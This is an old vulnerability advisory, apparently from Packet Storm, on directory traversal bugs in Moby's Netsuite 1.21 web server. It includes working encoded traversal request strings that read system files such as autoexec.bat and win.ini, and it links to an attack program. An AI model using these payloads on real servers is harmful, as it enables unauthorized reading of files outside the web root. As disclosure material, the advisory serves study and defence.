Moby's Netsuite 1.21 httpd server is vulnerable to a multitude of directory traversal bugs that allow an attacker to access files outside of the web root.
c3a9e9ae00e9e67b478e9d3093cc3f9669abbf2620d5783b4b97471d46479220
Moby's Netsuite 1.21 Traversal Directory bugs
Release Date:
13 July, 2003
Description:
NetSuite is a freeware server suite that allows anyone with a static IP address the ability to run their own mail and web services. Note that you cannot reasonably run a web server from a normal dial-in account.
Netsuite is designed for complete simplicity -- requiring only a few minutes to setup with no prior network skills or experience, and requires virtually no memory or processor time. General Windows file management and an understanding of the Internet is required. There are two sections: Moby Mail and Moby Web. Both are very direct to install and use, requiring only few minutes to begin using. Full source code for Microsoft Visual C++ 6.0 is available on the web.
There exists some directory traversal vulnerabilities that allow someone to download or read
files outside the web folder. In order for this attack to work we have to use some HTML characters instead of normal one.
The attack:
GET / HTTP/1.1
Host: /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat
In our example above we want to see the file autoexec.bat.
***The folder /error/ doesn't exist in my Pc:P ehhe
Other attack strings: http://127.0.0.1/%5c..%5c..%5c..%5cwindows%5cwin.ini
http://127.0.0.1/%5c..%5c..%5c..%5cwindows%5cwin%2eini
http://127.0.0.1/\..\..\..\windows\win.ini
While i was searching i found about 25 attack string.This is only a small sample above.
The Attack Program:
I have created a sample attack program for Moby's Netsuite 1.21(possibly it for all versions of Moby's Netsuite ). You can get it from here:
http://members.lycos.co.uk/r34ct/main/Netsuite_expl/
Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
Feedback
Please send suggestions, updates, and comments to:
Dr_insane
dr_insane@pathfinder.gr
http://members.lycos.co.uk/r34ct/
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed